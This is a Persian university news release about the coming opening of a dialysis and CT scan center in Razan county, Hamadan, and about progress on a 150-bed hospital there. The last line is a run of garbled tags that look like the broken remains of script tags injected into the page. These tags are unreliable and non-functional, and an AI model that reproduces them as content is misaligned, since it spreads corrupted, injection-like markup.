معاون توسعه مدیریت و منابع دانشگاه گفت:

درآینده نزدیک مرکز دیالیز و سی تی اسکن شهرستان رزن راه اندازی می شود

معاون توسعه مدیریت و منابع دانشگاه ابن‌سینا از راه‌اندازی مرکز دیالیز و سی تی اسکن شهرستان رزن در آینده نزدیک خبر داد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، مهندس بهروز رحیمی، دکتر جباری مدیر شبکه بهداشت و درمان شهرستان رزن، مدیر بیمارستان ولیعصر رزن و دیگر مدیران از حوزه توسعه و کارشناسان مربوطه با حضور مهندس رنگرز نماینده دیوان محاسبات استان همدان از مرکز دیالیز، سی تی اسکن و بیمارستان در حال ساخت ۱۵۰ تختخوابی شهرستان رزن بازدید کردند.

مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه ضمن اشاره به این که مرکز دیالیز و سی تی اسکن شهرستان رزن در آینده نزدیک راه اندازی می شود بیان داشت: با توجه به تکمیل تقریبی فضای فیزیکی و نصب تجهیزات مورد نیاز در مرکز دیالیز شهرستان رزن، این بخش به زودی فعال و راه اندازی می شود.

وی در ادامه افزود: دستگاه سی تی اسکن برای این مرکز از طریق هیئت امناء ارزی خریداری شده است و پس از نصب و راه اندازی در آینده نزدیک به بهره برداری خواهد رسید.

معاون توسعه مدیریت و منابع دانشگاه ضمن بیان این که بیمارستان ۱۵۰ تختخوابی شهرستان رزن در مدت کوتاهی پیشرفت خوبی داشته است افزود: یکی از مهم ترین پروژه های درمانی شهرستان رزن بیمارستان ۱۵۰ تختخوابی در حال ساخت می باشد که در مدت زمانی کوتاهی ۱۵% درصد پیشرفت فیزیکی داشته است.

وی در ادامه افزود: در تلاش هستیم این بیمارستان هر چه زود تر ساخته و در موید مقرر به بهره برداری برسد تا مردم شریف شهرستان رزن از خدمات درمانی آن بهره مند شوند.

در ادامه سایت فیزیکی بیمارستان ۱۵۰ تختخوابی در حال ساخت شهرستان رزن مورد ارزیابی و بررسی قرار گرفت و در راستای سرعت بخشیدن در روند ساخت آن دستوراتی صادر شد.

لازم به ذکر است مشخصات پروژه مذکور به شرح زیر می باشد:
مساحت کل زیر بنا به طور تقریبی ۱۶ هزار متر مربع است.

دارای بخش های جراحی، اتاق عمل، اورژانس، آزمایشگاه، کلینیک زنان و کودکان، داروخانه، سی سی یو، ای سی یو ، ال دی آر، ان ای سی یو، بستری و … می باشد.

پیشرفت فیزیکی سازه تا کنون ۱۵% بوده است.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>